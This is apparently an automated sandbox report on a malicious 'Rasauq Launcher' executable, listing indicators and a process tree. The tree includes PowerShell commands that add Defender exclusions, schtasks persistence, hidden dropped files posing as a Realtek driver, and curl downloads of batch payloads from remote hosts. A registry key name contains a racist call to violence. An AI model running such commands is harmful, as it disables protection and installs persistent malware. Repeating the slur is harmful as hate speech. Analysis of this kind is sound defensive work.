\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 3672 timeout.exe 6812 Process not Found 3088 timeout.exe 4828 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 37 IoCs
pid Process 3168 taskkill.exe 5744 taskkill.exe 672 taskkill.exe 5608 taskkill.exe 124 taskkill.exe 2800 taskkill.exe 5044 taskkill.exe 4824 taskkill.exe 4168 taskkill.exe 3276 taskkill.exe 4004 taskkill.exe 244 taskkill.exe 2256 taskkill.exe 4516 taskkill.exe 4660 taskkill.exe 1980 taskkill.exe 6108 taskkill.exe 4408 taskkill.exe 4688 taskkill.exe 6160 Process not Found 4168 taskkill.exe 4492 taskkill.exe 980 taskkill.exe 1856 taskkill.exe 300 taskkill.exe 5236 taskkill.exe 2128 taskkill.exe 4100 taskkill.exe 3480 taskkill.exe 5720 taskkill.exe 4292 taskkill.exe 5320 taskkill.exe 4628 taskkill.exe 3080 taskkill.exe 6024 taskkill.exe 3376 taskkill.exe 2228 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-20\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Software reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-19\Software reg.exe Key created \REGISTRY\USER\S-1-5-19 reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software reg.exe Key created \REGISTRY\USER\.DEFAULT reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-20 reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-19\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-19 reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings reg.exe Key created \REGISTRY\USER\S-1-5-19\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing reg.exe -
Modifies registry class 28 IoCs
description ioc Process Key created \Registry\User\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ reg.exe Key created \Registry\User\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3920535620-1286624088-2946613906-1000\{764A2F7D-8884-4AA4-911E-3CA6BCECFEDC} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers reg.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3920535620-1286624088-2946613906-1000\{A04EEBD0-CA44-4981-A1D8-AAABB563520F} msedge.exe Key created \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5908 schtasks.exe 1252 schtasks.exe 3632 schtasks.exe 2672 schtasks.exe 3168 schtasks.exe 5384 Process not Found -
Suspicious behavior: EnumeratesProcesses 58 IoCs
pid Process 1960 powershell.exe 5808 powershell.exe 1960 powershell.exe 5808 powershell.exe 1696 powershell.exe 1860 powershell.exe 1696 powershell.exe 1860 powershell.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 5600 powershell.exe 5600 powershell.exe 4544 powershell.exe 4544 powershell.exe 1372 powershell.exe 1372 powershell.exe 1252 powershell.exe 5572 powershell.exe 1252 powershell.exe 5572 powershell.exe 1444 powershell.exe 1444 powershell.exe 3788 powershell.exe 3788 powershell.exe 3848 powershell.exe 3848 powershell.exe 1968 powershell.exe 1968 powershell.exe 5836 powershell.exe 5836 powershell.exe 5928 powershell.exe 5928 powershell.exe 4920 powershell.exe 4920 powershell.exe 3756 powershell.exe 3756 powershell.exe 3756 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4456 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
pid Process 3708 msedge.exe 3708 msedge.exe 3708 msedge.exe 3708 msedge.exe 3708 msedge.exe 3708 msedge.exe 3708 msedge.exe 3708 msedge.exe 3708 msedge.exe 3708 msedge.exe 3708 msedge.exe 3708 msedge.exe 3708 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1040 Rasauq SoftWorks.exe Token: SeDebugPrivilege 1960 powershell.exe Token: SeDebugPrivilege 5808 powershell.exe Token: SeDebugPrivilege 4292 taskkill.exe Token: SeDebugPrivilege 2800 taskkill.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 1860 powershell.exe Token: SeBackupPrivilege 4992 vssvc.exe Token: SeRestorePrivilege 4992 vssvc.exe Token: SeAuditPrivilege 4992 vssvc.exe Token: SeDebugPrivilege 6020 sRasauq SoftWorks.exe Token: SeDebugPrivilege 5600 powershell.exe Token: SeDebugPrivilege 4544 powershell.exe Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 1252 powershell.exe Token: SeDebugPrivilege 5572 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 3788 powershell.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 5836 powershell.exe Token: SeDebugPrivilege 5928 powershell.exe Token: SeDebugPrivilege 5044 taskkill.exe Token: SeDebugPrivilege 300 taskkill.exe Token: SeDebugPrivilege 5236 taskkill.exe Token: SeDebugPrivilege 3168 taskkill.exe Token: SeDebugPrivilege 4920 powershell.exe Token: SeDebugPrivilege 1040 Rasauq SoftWorks.exe Token: SeDebugPrivilege 2128 taskkill.exe Token: SeDebugPrivilege 4628 taskkill.exe Token: SeDebugPrivilege 5320 taskkill.exe Token: SeDebugPrivilege 2256 taskkill.exe Token: SeDebugPrivilege 4168 taskkill.exe Token: SeDebugPrivilege 4516 taskkill.exe Token: SeDebugPrivilege 4100 taskkill.exe Token: SeDebugPrivilege 5744 taskkill.exe Token: SeDebugPrivilege 4660 taskkill.exe Token: SeDebugPrivilege 4492 taskkill.exe Token: SeDebugPrivilege 4824 taskkill.exe Token: SeDebugPrivilege 3080 taskkill.exe Token: SeDebugPrivilege 1980 taskkill.exe Token: SeDebugPrivilege 6108 taskkill.exe Token: SeDebugPrivilege 672 taskkill.exe Token: SeDebugPrivilege 5608 taskkill.exe Token: SeDebugPrivilege 6024 taskkill.exe Token: SeDebugPrivilege 3276 taskkill.exe Token: SeDebugPrivilege 124 taskkill.exe Token: SeDebugPrivilege 4004 taskkill.exe Token: SeDebugPrivilege 244 taskkill.exe Token: SeDebugPrivilege 3376 taskkill.exe Token: SeDebugPrivilege 1856 taskkill.exe Token: SeDebugPrivilege 980 taskkill.exe Token: SeDebugPrivilege 3480 taskkill.exe Token: SeDebugPrivilege 4408 taskkill.exe Token: SeTakeOwnershipPrivilege 296 takeown.exe Token: SeShutdownPrivilege 2272 powercfg.exe Token: SeCreatePagefilePrivilege 2272 powercfg.exe Token: SeShutdownPrivilege 484 powercfg.exe Token: SeCreatePagefilePrivilege 484 powercfg.exe Token: SeShutdownPrivilege 1972 powercfg.exe Token: SeCreatePagefilePrivilege 1972 powercfg.exe Token: SeShutdownPrivilege 5728 powercfg.exe Token: SeCreatePagefilePrivilege 5728 powercfg.exe Token: SeShutdownPrivilege 5884 powercfg.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1960 powershell.exe 5808 powershell.exe 3708 msedge.exe 3708 msedge.exe 4456 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1336 wrote to memory of 1040 1336 Rasauq Launcher.exe 84 PID 1336 wrote to memory of 1040 1336 Rasauq Launcher.exe 84 PID 1336 wrote to memory of 6020 1336 Rasauq Launcher.exe 85 PID 1336 wrote to memory of 6020 1336 Rasauq Launcher.exe 85 PID 1336 wrote to memory of 5204 1336 Rasauq Launcher.exe 86 PID 1336 wrote to memory of 5204 1336 Rasauq Launcher.exe 86 PID 5204 wrote to memory of 1072 5204 cmd.exe 88 PID 5204 wrote to memory of 1072 5204 cmd.exe 88 PID 5204 wrote to memory of 5212 5204 cmd.exe 89 PID 5204 wrote to memory of 5212 5204 cmd.exe 89 PID 5204 wrote to memory of 3976 5204 cmd.exe 90 PID 5204 wrote to memory of 3976 5204 cmd.exe 90 PID 5204 wrote to memory of 488 5204 cmd.exe 91 PID 5204 wrote to memory of 488 5204 cmd.exe 91 PID 488 wrote to memory of 2740 488 cmd.exe 94 PID 488 wrote to memory of 2740 488 cmd.exe 94 PID 3976 wrote to memory of 4504 3976 cmd.exe 95 PID 3976 wrote to memory of 4504 3976 cmd.exe 95 PID 488 wrote to memory of 1960 488 cmd.exe 96 PID 488 wrote to memory of 1960 488 cmd.exe 96 PID 3976 wrote to memory of 5808 3976 cmd.exe 97 PID 3976 wrote to memory of 5808 3976 cmd.exe 97 PID 488 wrote to memory of 3052 488 cmd.exe 98 PID 488 wrote to memory of 3052 488 cmd.exe 98 PID 3976 wrote to memory of 5892 3976 cmd.exe 99 PID 3976 wrote to memory of 5892 3976 cmd.exe 99 PID 488 wrote to memory of 4260 488 cmd.exe 199 PID 488 wrote to memory of 4260 488 cmd.exe 199 PID 488 wrote to memory of 3852 488 cmd.exe 101 PID 488 wrote to memory of 3852 488 cmd.exe 101 PID 488 wrote to memory of 4272 488 cmd.exe 102 PID 488 wrote to memory of 4272 488 cmd.exe 102 PID 3976 wrote to memory of 4268 3976 cmd.exe 103 PID 3976 wrote to memory of 4268 3976 cmd.exe 103 PID 3976 wrote to memory of 4660 3976 cmd.exe 104 PID 3976 wrote to memory of 4660 3976 cmd.exe 104 PID 488 wrote to memory of 4648 488 cmd.exe 105 PID 488 wrote to memory of 4648 488 cmd.exe 105 PID 3976 wrote to memory of 4708 3976 cmd.exe 106 PID 3976 wrote to memory of 4708 3976 cmd.exe 106 PID 488 wrote to memory of 1008 488 cmd.exe 107 PID 488 wrote to memory of 1008 488 cmd.exe 107 PID 3976 wrote to memory of 4544 3976 cmd.exe 207 PID 3976 wrote to memory of 4544 3976 cmd.exe 207 PID 488 wrote to memory of 544 488 cmd.exe 109 PID 488 wrote to memory of 544 488 cmd.exe 109 PID 3976 wrote to memory of 1372 3976 cmd.exe 209 PID 3976 wrote to memory of 1372 3976 cmd.exe 209 PID 488 wrote to memory of 5324 488 cmd.exe 111 PID 488 wrote to memory of 5324 488 cmd.exe 111 PID 3976 wrote to memory of 4036 3976 cmd.exe 112 PID 3976 wrote to memory of 4036 3976 cmd.exe 112 PID 488 wrote to memory of 5596 488 cmd.exe 113 PID 488 wrote to memory of 5596 488 cmd.exe 113 PID 3976 wrote to memory of 3328 3976 cmd.exe 114 PID 3976 wrote to memory of 3328 3976 cmd.exe 114 PID 488 wrote to memory of 4032 488 cmd.exe 115 PID 488 wrote to memory of 4032 488 cmd.exe 115 PID 3976 wrote to memory of 4688 3976 cmd.exe 116 PID 3976 wrote to memory of 4688 3976 cmd.exe 116 PID 3976 wrote to memory of 5488 3976 cmd.exe 117 PID 3976 wrote to memory of 5488 3976 cmd.exe 117 PID 3976 wrote to memory of 3160 3976 cmd.exe 118 PID 3976 wrote to memory of 3160 3976 cmd.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1384 attrib.exe 4744 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3788 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3768
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3632
-
-
-
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6020 -
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1384
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4744
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEA02.tmp.bat""3⤵PID:5292
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:3672
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"4⤵
- Executes dropped EXE
PID:2052 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe5⤵PID:6072
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:2672
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe5⤵PID:4964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3756
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:005⤵
- Scheduled Task/Job: Scheduled Task
PID:3168 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4152
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:5204 -
C:\Windows\system32\curl.execurl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat3⤵PID:1072
-
-
C:\Windows\system32\curl.execurl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat3⤵PID:5212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\system32\openfiles.exeopenfiles4⤵PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(new-object -com shell.application).minimizeall()"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5808
-
-
C:\Windows\system32\curl.execurl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png4⤵PID:5892
-
-
